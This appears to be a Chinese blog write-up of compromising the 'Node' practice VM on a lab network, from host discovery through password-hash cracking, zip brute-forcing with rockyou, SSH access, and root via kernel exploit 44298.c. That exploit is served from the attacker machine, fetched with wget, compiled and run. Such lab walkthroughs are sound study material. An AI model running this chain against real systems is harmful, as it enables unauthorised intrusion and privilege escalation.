Node 靶机渗透过程 | Ankioの记事本

admin 2022年10月30日14:01:17Node 靶机渗透过程 | Ankioの记事本已关闭评论40 views字数 1300阅读4分20秒阅读模式

攻击机:192.168.43.109

被攻击机:192.168.43.164

靶机安装#

  • 使用 Virtual Box 打开(vmware 无法正常工作)
  • 虚拟机使用桥接模式

网络发现#

  • netdiscover -r 192.168.43.0/24

  • 桥接网络与 kali 在同一个网段里面,所以只要扫描上面的网段就行

  • 扫描完成后,通过对比 mac 地址找到要攻击的机子

端口扫描识别#

  • nmap -v -A 192.168.43.164

  • 22 是 ssh,3000 是 web 服务

漏洞发现#

  • 从 Web 服务下手

  • 先扫一下目录

    dirb http://192.168.43.164:3000

  • 意思就是这个网站太稳定了...访问啥都是同一个页面...毫无变化

  • 前面扫描可以知道整个站点使用的是 nodejs 搭建的...所以页面的变化是通过 js 来渲染的

  • 打开网站瞧瞧(随手 F12 好习惯)

  • 首页请求了两个非资源类 url

  • 第一个是页面模板

  • 第二个是用户数据,并在里面发现了一些有意思的数据

  • 密码是 hash 加密的,拿到 cmd5 查一下就查到了

    tom- spongebob

  • 登录了一下成功了,但是没什么用,有一串提示

  • 就是说只有管理员才能访问控制面板,但是刚才的账号里面并没有管理员

  • 因为访问的 url 为:api/users/latest,(latest=>最新的),看上去这个 latest 像是一个参数,尝试把他去掉后访问

    • 找到了管理员账号
    • 解密 myP14ceAdm1nAcc0uNT - manchester
  • 拿着管理员账号登录成功

  • 可以下载备份文件,备份是一串 base64 编码

  • 尝试解码

    cat myplace.backup|base64 -d >mypalce

  • 解开之后是个压缩包

  • 解压 unzip mypalce

  • 需要密码,尝试了上面的管理员密码,失败,考虑爆破,采用 kali 自带的 rockyou.txt,使用前需要解压 fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u mypalce

  • 解出来的密码为 magicword

  • 在 app.js 里面发现了 mongodb 的账号(mark)和密码(5AYRft73VtFpc84k),监听在本地端口 27017

  • 然而比较尴尬的事情是,知道了也登不上去...端口没开,也不允许远程登录......

  • 又搜了所有的文件也没什么有用的信息(其实不是很懂 nodejs,不过从 js 的角度看,好像没有什么漏洞)

  • 前面不是还找到了一个 ssh 的端口嘛~试试从这里下手

  • 居然登录成功了...

  • 权限低的可怜...

  • 没有发现可以直接提权的地方,查一下系统信息(要站在巨人的肩膀上,hhh)

    uname -a

  • 用 kali 查找内核漏洞

    searchsploit 4.4.0

  • 有一个可以直接用的 exp,kali 搭建临时服务器

    cd /usr/share/exploitdb/exploits/linux/local/

    python -m SimpleHTTPServer 80

  • ssh 切换到 tmp 目录,并下载这个 exp,使用 gcc 编译运行

    cd /tmp

    wget http://192.168.43.109/44298.c

    gcc 44298.c -o exp

    ./exp

  • 直接就切换到了 root 权限

  • 由于做到最后电脑突然出问题,蓝屏了就不截图了

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月30日14:01:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Node 靶机渗透过程 | Ankioの记事本http://cn-sec.com/archives/1380062.html